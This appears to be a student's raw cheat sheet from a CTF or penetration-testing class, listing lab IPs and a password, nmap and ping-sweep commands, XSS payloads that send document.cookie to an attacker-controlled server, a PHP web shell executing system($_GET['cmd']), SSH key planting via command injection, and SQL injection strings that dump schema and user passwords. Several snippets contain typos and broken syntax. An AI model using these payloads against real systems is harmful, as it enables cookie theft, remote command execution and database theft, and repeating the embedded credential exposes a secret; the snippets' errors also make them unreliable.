http://10.50.22.9:8000/ - ctfd 
10.50.34.208- grey 
QjnK39dDzI8iYsH password(cancer) 



------------------------------------------------------------------------------------------------------------------------------------------------------------
                                                                       Reconnaissance
------------------------------------------------------------------------------------------------------------------------------------------------------------
HTML/websites:
scraper:
 
import lxml.html 
import requests 


page = requests.get('http://quotes.toscrape.com') 
tree = lxml.html.fromstring(page.content) 

results = tree.xpath('//small[@class="author"]/text()') 

print("Results: ", results) 


host enum:
nmap -Pn -T4 --min--rate 32479827348441 10.50.27.95 -p22,80,8080,2222,4444

ping sweep: 
for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done


nmap scripts: 
--script=banner.nse 
--script=http.enum.nse 
--script=smb-os-discovery 
--script

run on op station 
<script>document.location="http://OPIP:8000"+document.cookie;</script> 
python3 -m http.server




<script> document.location="http://SEVERIP/uploads/cookie_stealer.php? username ="+document.cookie;</script> 






<HTML><BODY> 
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd"> 
<INPUT TYPE="submit" VALUE="send"> 
</FORM> 
<?php 
if($_GET['cmd']) {
system($_GET['cmd])
} 
?>
</pre> 
</BODY></HTML> 



ssh-keygen -t rsa -b 4096 
upload public key to .ssh via command injection 
ssh -I ~/.ssh/id_rsa WWWDATA@ip 









------------------------------------------------------------------------------------------------------------------------------------------------------------



mysql
-starts sql

show databases;
-show data

show tables from session;
-show specific table from database

select * from session.Tires;
-select everything from a session

select tireid,name,cost from seesion.Tires;
-shows specific columns from session

use session;
-go into session
  select * from Tires;
  

-character entries are in quotes by default and can be broken by adding your own quotes

User' OR '1=1

http://10.50.42.112/uniondemo.php?Selection=2 UNION select 1,2,3
-find feilds available abd what order they display

Selection=2 UNION select table_schema,column_name,table_name from information_schema.columns

User guide .columns in reasouce

Selection=2 UNION select name,type,cost from session.car;#

Selection=2 UNION select id,pass,name from session.user;#



